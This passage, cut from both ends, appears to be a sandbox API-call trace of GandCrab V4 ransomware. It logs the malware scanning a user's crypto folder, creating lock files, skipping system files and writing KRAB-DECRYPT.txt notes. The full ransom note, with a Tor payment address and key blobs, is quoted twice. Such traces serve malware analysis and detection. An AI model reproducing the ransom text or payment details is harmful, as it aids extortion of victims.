recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.139] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.140] CloseHandle (hObject=0x440) returned 1 [0059.140] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.141] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.141] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x150)) [0059.141] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.141] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.141] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.142] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock") returned 82 [0059.142] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0059.145] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.145] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.147] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 59 [0059.147] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0059.147] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd4a0 [0059.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.147] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.147] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.147] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.147] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.147] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock" [0059.147] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.148] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 87 [0059.148] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a08d2ca4dee3d.lock") returned 82 [0059.148] lstrlenW (lpString=".lock") returned 5 [0059.148] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.148] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.148] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.148] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.149] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.149] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.149] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.149] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt" [0059.149] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.149] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt.KRAB") returned 80 [0059.149] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt") returned 75 [0059.149] lstrlenW (lpString=".txt") returned 4 [0059.149] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.150] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.150] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt") returned 75 [0059.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\KRAB-DECRYPT.txt") returned 75 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.150] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.151] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.151] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0059.151] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0059.151] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000" [0059.151] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0059.151] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.151] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.151] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.151] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.151] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.151] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.152] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.152] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt") returned 122 [0059.152] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0059.164] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.165] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.165] CloseHandle (hObject=0x448) returned 1 [0059.166] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.166] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.166] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x170)) [0059.166] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.167] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.167] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.167] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 128 [0059.167] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0059.168] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.169] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 105 [0059.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0059.169] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd620 [0059.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.169] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.169] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.169] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.169] lstrcmpW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2=".") returned 1 [0059.169] lstrcmpW 